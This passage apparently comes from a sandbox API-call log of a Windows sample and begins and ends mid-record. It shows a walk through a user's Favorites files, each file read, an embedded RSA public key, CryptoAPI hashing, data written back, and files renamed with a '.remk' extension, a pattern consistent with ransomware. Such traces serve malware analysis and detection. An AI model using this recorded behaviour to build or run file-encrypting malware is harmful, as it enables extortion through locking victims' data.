lpMem=0x31ee520 | out: hHeap=0x630000) returned 1 [0233.787] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x8) returned 0x68ed28 [0233.787] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x72fee0 | out: hHeap=0x630000) returned 1 [0233.787] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x14) returned 0x31a0ea8 [0233.787] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x68ed28 | out: hHeap=0x630000) returned 1 [0233.787] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x18) returned 0x31a0ec8 [0233.787] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ee4d8 | out: hHeap=0x630000) returned 1 [0233.787] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x31ee4d8 [0233.787] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x72fec0 | out: hHeap=0x630000) returned 1 [0233.787] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x204) returned 0x37c0db8 [0233.787] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ee538 | out: hHeap=0x630000) returned 1 [0233.787] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x108) returned 0x31f6d60 [0233.787] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ee568 | out: hHeap=0x630000) returned 1 [0233.787] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x210) returned 0x37c0fc8 [0233.787] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31a0ec8 | out: hHeap=0x630000) returned 1 [0233.787] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x10c) returned 0x72aea0 [0233.787] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x68ed18 | out: hHeap=0x630000) returned 1 [0233.787] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x108) returned 0x31f6c48 [0233.787] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ee4d8 | out: hHeap=0x630000) returned 1 [0233.788] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x200) returned 0x37b5b70 [0233.788] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31f6d60 | out: hHeap=0x630000) returned 1 [0233.788] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x100) returned 0x319bc40 [0233.788] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x72fea0 | out: hHeap=0x630000) returned 1 [0233.788] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x694398 | out: hHeap=0x630000) returned 1 [0233.788] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x6a7330 | out: hHeap=0x630000) returned 1 [0233.788] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x319bc40 | out: hHeap=0x630000) returned 1 [0233.788] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31a0ea8 | out: hHeap=0x630000) returned 1 [0233.788] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31f6c48 | out: hHeap=0x630000) returned 1 [0233.788] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37c0fc8 | out: hHeap=0x630000) returned 1 [0233.788] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37b5b70 | out: hHeap=0x630000) returned 1 [0233.788] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x72aea0 | out: hHeap=0x630000) returned 1 [0233.788] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x325f758 | out: hHeap=0x630000) returned 1 [0233.788] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ee508 | out: hHeap=0x630000) returned 1 [0233.788] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x325f778 | out: hHeap=0x630000) returned 1 [0233.788] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ee550 | out: hHeap=0x630000) returned 1 [0233.788] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31a0f28 | out: hHeap=0x630000) returned 1 [0233.788] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ee4f0 | out: hHeap=0x630000) returned 1 [0233.789] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ee4c0 | out: hHeap=0x630000) returned 1 [0233.789] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37bddc8 | out: hHeap=0x630000) returned 1 [0233.789] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31a8ac8 | out: hHeap=0x630000) returned 1 [0233.789] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x65dd10 | out: hHeap=0x630000) returned 1 [0233.789] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ee4a8 | out: hHeap=0x630000) returned 1 [0233.789] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37bba98 | out: hHeap=0x630000) returned 1 [0233.789] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37c0db8 | out: hHeap=0x630000) returned 1 [0233.789] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x3195950 | out: hHeap=0x630000) returned 1 [0233.789] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31b5808 | out: hHeap=0x630000) returned 1 [0233.789] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31f6b30 | out: hHeap=0x630000) returned 1 [0233.789] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31a0f08 | out: hHeap=0x630000) returned 1 [0233.789] SetFilePointerEx (in: hFile=0x640, liDistanceToMove=0xe2, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0233.789] WriteFile (in: hFile=0x640, lpBuffer=0x3192918*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x3adfb50, lpOverlapped=0x0 | out: lpBuffer=0x3192918*, lpNumberOfBytesWritten=0x3adfb50*=0x100, lpOverlapped=0x0) returned 1 [0233.790] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0233.790] WriteFile (in: hFile=0x640, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0x3adfb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, lpNumberOfBytesWritten=0x3adfb50*=0x26, lpOverlapped=0x0) returned 1 [0233.790] CloseHandle (hObject=0x640) returned 1 [0233.804] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x90) returned 0x65e568 [0233.804] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x8a0) returned 0x37bc408 [0233.804] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Links\\Web Slice Gallery.url" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\favorites\\links\\web slice gallery.url"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Links\\Web Slice Gallery.url.remk" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\favorites\\links\\web slice gallery.url.remk")) returned 1 [0233.807] FindNextFileW (in: hFindFile=0x31de130, lpFindFileData=0x3adfba4 | out: lpFindFileData=0x3adfba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x28d4b900, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d4b900, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2d9517a0, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0xe2, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Web Slice Gallery.url", cAlternateFileName="WEBSLI~1.URL")) returned 0 [0233.807] FindClose (in: hFindFile=0x31de130 | out: hFindFile=0x31de130) returned 1 [0233.807] PeekMessageW (in: lpMsg=0x3adff08, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x3adff08) returned 0 [0233.807] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x80) returned 0x694398 [0233.807] PeekMessageW (in: lpMsg=0x3adfb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x3adfb74) returned 0 [0233.807] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x80) returned 0x695278 [0233.807] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x37a2b08 [0233.807] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Microsoft Websites\\") returned="Microsoft Websites\\" [0233.807] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x30) returned 0x31a8a20 [0233.807] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x60) returned 0x711900 [0233.808] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\") returned="Favorites\\" [0233.808] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x40) returned 0x37bba98 [0233.808] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\") returned="5p5NrGJn0jS HALPmcxz\\" [0233.808] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed738 [0233.808] PathFindFileNameW (pszPath="C:\\Users\\") returned="Users\\" [0233.808] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0233.808] PathFindFileNameW (pszPath="") returned="" [0233.808] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x80) returned 0x695278 [0233.808] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Microsoft Websites\\*", lpFindFileData=0x3adfba4 | out: lpFindFileData=0x3adfba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d4b900, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0xfe5472dd, ftLastWriteTime.dwHighDateTime=0x1cb8926, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x31de130 [0233.809] FindNextFileW (in: hFindFile=0x31de130, lpFindFileData=0x3adfba4 | out: lpFindFileData=0x3adfba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d4b900, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0xfe5472dd, ftLastWriteTime.dwHighDateTime=0x1cb8926, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0233.809] FindNextFileW (in: hFindFile=0x31de130, lpFindFileData=0x3adfba4 | out: lpFindFileData=0x3adfba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x28d4b900, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d4b900, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2d86cf60, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x85, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="IE Add-on site.url", cAlternateFileName="IEADD-~1.URL")) returned 1 [0233.809] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x80) returned 0x695278 [0233.809] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xbe) returned 0x31c7810 [0233.810] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Microsoft Websites\\IE Add-on site.url") returned=".url" [0233.810] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Microsoft Websites\\IE Add-on site.url" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\favorites\\microsoft websites\\ie add-on site.url"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x640 [0233.810] GetFileSizeEx (in: hFile=0x640, lpFileSize=0x3adfb40 | out: lpFileSize=0x3adfb40*=133) returned 1 [0233.810] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x3c20000 [0233.813] SetFilePointerEx (in: hFile=0x640, liDistanceToMove=0x5f, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0233.813] ReadFile (in: hFile=0x640, lpBuffer=0x3c20000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x3adfb78, lpOverlapped=0x0 | out: lpBuffer=0x3c20000*, lpNumberOfBytesRead=0x3adfb78*=0x26, lpOverlapped=0x0) returned 1 [0233.814] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x30) returned 0x31a8a58 [0233.814] ReadFile (in: hFile=0x640, lpBuffer=0x3c20000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x3adfb70, lpOverlapped=0x0 | out: lpBuffer=0x3c20000*, lpNumberOfBytesRead=0x3adfb70*=0x85, lpOverlapped=0x0) returned 1 [0233.814] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAwdxVEoRJKEq6Zc+IUOh4\\\\nSZTvgM3dE31tl2IhtkUSEcre0ILXT4AiUOX8OtDw9l4SuTTYK8pwrbHa0gQ7EsZs\\\\n\\/XxaW29xuG5Z1OqnM+2sitDrl+pHFYaPNf2cM5\\/WnLAl200OXkLC79l1Fiw9YU\\/Y\\\\nFw0hSW\\/qjak1uCkPHTK4OLYCCTkrI5qwlb5CyHzcL33VHtqw7OFSWT36+19dMApx\\\\njauETTMkx63ow8WEkyxtRMqQTQP5\\/T0hS8wm1EYjqN9TzOx0TimU\\/mvD5MiAct9f\\\\n\\/j7SyUb3YwTsFlJh+HxLYqUXxbT0qyvAeprv0BtlwgYhYFDwM8Xl8\\/NGKiDE5NlR\\\\nzwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 497 [0233.814] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x1f6) returned 0x325fb40 [0233.814] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAwdxVEoRJKEq6Zc+IUOh4\\\\nSZTvgM3dE31tl2IhtkUSEcre0ILXT4AiUOX8OtDw9l4SuTTYK8pwrbHa0gQ7EsZs\\\\n\\/XxaW29xuG5Z1OqnM+2sitDrl+pHFYaPNf2cM5\\/WnLAl200OXkLC79l1Fiw9YU\\/Y\\\\nFw0hSW\\/qjak1uCkPHTK4OLYCCTkrI5qwlb5CyHzcL33VHtqw7OFSWT36+19dMApx\\\\njauETTMkx63ow8WEkyxtRMqQTQP5\\/T0hS8wm1EYjqN9TzOx0TimU\\/mvD5MiAct9f\\\\n\\/j7SyUb3YwTsFlJh+HxLYqUXxbT0qyvAeprv0BtlwgYhYFDwM8Xl8\\/NGKiDE5NlR\\\\nzwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 497 [0233.814] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAwdxVEoRJKEq6Zc+IUOh4\\\\nSZTvgM3dE31tl2IhtkUSEcre0ILXT4AiUOX8OtDw9l4SuTTYK8pwrbHa0gQ7EsZs\\\\n\\/XxaW29xuG5Z1OqnM+2sitDrl+pHFYaPNf2cM5\\/WnLAl200OXkLC79l1Fiw9YU\\/Y\\\\nFw0hSW\\/qjak1uCkPHTK4OLYCCTkrI5qwlb5CyHzcL33VHtqw7OFSWT36+19dMApx\\\\njauETTMkx63ow8WEkyxtRMqQTQP5\\/T0hS8wm1EYjqN9TzOx0TimU\\/mvD5MiAct9f\\\\n\\/j7SyUb3YwTsFlJh+HxLYqUXxbT0qyvAeprv0BtlwgYhYFDwM8Xl8\\/NGKiDE5NlR\\\\nzwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 497 [0233.814] CryptAcquireContextW (in: phProv=0x3adfa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x3adfa50*=0x695278) returned 1 [0233.815] CryptCreateHash (in: hProv=0x695278, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x3adfa58 | out: phHash=0x3adfa58) returned 1 [0233.815] CryptHashData (hHash=0x31de170, pbData=0x325fb40, dwDataLen=0x1f6, dwFlags=0x0) returned 1 [0233.815] CryptGetHashParam (in: hHash=0x31de170, dwParam=0x2, pbData=0x0, pdwDataLen=0x3adfa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x3adfa54) returned 1 [0233.815] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x11) returned 0x31a0f08 [0233.815] CryptGetHashParam (in: hHash=0x31de170, dwParam=0x2, pbData=0x31a0f08, pdwDataLen=0x3adfa54, dwFlags=0x0 | out: pbData=0x31a0f08, pdwDataLen=0x3adfa54) returned 1 [0233.815] GetLastError () returned 0x0 [0233.816] CryptDestroyHash (hHash=0x31de170) returned 1 [0233.816] CryptReleaseContext (hProv=0x695278, dwFlags=0x0) returned 1 [0233.816] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x325fb40 | out: hHeap=0x630000) returned 1 [0233.816] UuidCreate (in: Uuid=0x3adfa48 | out: Uuid=0x3adfa48) returned 0x0 [0233.816] UuidToStringA (in: Uuid=0x3adfa48, StringUuid=0x3adfa40 | out: StringUuid=0x3adfa40) returned 0x0 [0233.816] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x30) returned 0x31a8a90 [0233.816] RpcStringFreeA (in: String=0x3adfa40 | out: String=0x3adfa40) returned 0x0 [0233.816] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31a8a58 | out: hHeap=0x630000) returned 1 [0233.816] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x30) returned 0x31a8a58 [0233.816] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x90) returned 0x65e698 [0233.816] SetFilePointer (in: hFile=0x640, lDistanceToMove=5, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x5 [0233.816] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31a8a90 | out: hHeap=0x630000) returned 1 [0233.816] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x200) returned 0x325fb40 [0233.816] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x30) returned 0x31a8a90 [0233.816] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x200) returned 0x325fd48 [0233.816] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x58) returned 0x31d6930 [0233.816] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x40) returned 0x37bba98 [0233.816] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x31ee4a8 [0233.816] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x40) returned 0x37bbae0 [0233.816] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x31ee4c0 [0233.816] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x31ee4f0 [0233.816] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x31ee550 [0233.817] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x31ee508 [0233.817] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x24) returned 0x31ec670 [0233.817] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x158) returned 0x31f7b30 [0233.817] RtlReAllocateHeap (Heap=0x630000, Flags=0x0, Ptr=0x31f7b30, Size=0x218) returned 0x37b1b88 [0233.817] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x558) returned 0x37b5b70 [0233.817] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ee4f0 | out: hHeap=0x630000) returned 1 [0233.817] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ee508 | out: hHeap=0x630000) returned 1 [0233.817] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ee550 | out: hHeap=0x630000) returned 1 [0233.817] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ec670 | out: hHeap=0x630000) returned 1 [0233.817] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37b5b70 | out: hHeap=0x630000) returned 1 [0233.817] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x31ee550 [0233.817] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x8) returned 0x72feb0 [0233.817] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x10) returned 0x31ee508 [0233.817] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x18) returned 0x31a0ee8 [0233.817] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x9) returned 0x31ee4f0 [0233.817] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x8) returned 0x72fea0 [0233.817] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x10e) returned 0x3192918 [0233.817] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed738 [0233.817] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x58) returned 0x31d6990 [0233.817] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x14) returned 0x31a0f08 [0233.817] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x104) returned 0x31f6b30 [0233.817] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x14) returned 0x31a0f28 [0233.818] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x72fec0 [0233.818] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x3192918 | out: hHeap=0x630000) returned 1 [0233.818] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ee508 | out: hHeap=0x630000) returned 1 [0233.818] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x72fea0 | out: hHeap=0x630000) returned 1 [0233.818] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ee4f0 | out: hHeap=0x630000) returned 1 [0233.818] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31a0ee8 | out: hHeap=0x630000) returned 1 [0233.818] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x72feb0 | out: hHeap=0x630000) returned 1 [0233.818] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ee550 | out: hHeap=0x630000) returned 1 [0233.818] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed738 | out: hHeap=0x630000) returned 1 [0233.818] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31d6930 | out: hHeap=0x630000) returned 1 [0233.818] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37b1b88 | out: hHeap=0x630000) returned 1 [0233.818] GetCurrentThreadId () returned 0x314 [0233.818] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x100) returned 0x3192918 [0233.818] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x82) returned 0x37ba310 [0233.818] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x2c) returned 0x31a8ac8 [0233.818] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x80) returned 0x695278 [0233.818] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x148) returned 0x37bddc8 [0233.818] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x72feb0 [0233.818] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x72fea0 [0233.818] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x100) returned 0x65dd10 [0233.818] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x64) returned 0x7051d8 [0233.818] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x7051d8 | out: hHeap=0x630000) returned 1 [0233.818] GetCurrentThreadId () returned 0x314 [0233.818] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x64) returned 0x7051d8 [0233.818] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x7051d8 | out: hHeap=0x630000) returned 1 [0233.818] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xeb) returned 0x6a7330 [0233.819] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x64) returned 0x7051d8 [0233.819] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x7051d8 | out: hHeap=0x630000) returned 1 [0233.819] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x64) returned 0x7051d8 [0233.819] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x7051d8 | out: hHeap=0x630000) returned 1 [0233.819] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x6a7330 | out: hHeap=0x630000) returned 1 [0233.819] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x100) returned 0x6a7330 [0233.819] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x72feb0 | out: hHeap=0x630000) returned 1 [0233.819] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4c) returned 0x31b5808 [0233.819] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x72feb0 [0233.819] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x100) returned 0x3195950 [0233.819] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x72fee0 [0233.819] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x31ee550 [0233.819] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x72fee0 | out: hHeap=0x630000) returned 1 [0233.819] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x72fee0 [0233.819] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x72ff00 [0233.819] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x68ed18 [0233.819] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x68ed28 [0233.819] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x325f758 [0233.819] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x325f768 [0233.819] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x325f778 [0233.819] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x31ee4f0 [0233.820] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x72ff00 | out: hHeap=0x630000) returned 1 [0233.820] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x8) returned 0x72ff00 [0233.820] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x72fee0 | out: hHeap=0x630000) returned 1 [0233.820] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x72fee0 [0233.820] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x325f788 [0233.820] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x325f798 [0233.820] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x325f7a8 [0233.820] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x31ee508 [0233.820] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x325f798 | out: hHeap=0x630000) returned 1 [0233.820] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x14) returned 0x31a0ee8 [0233.820] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x325f788 | out: hHeap=0x630000) returned 1 [0233.820] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 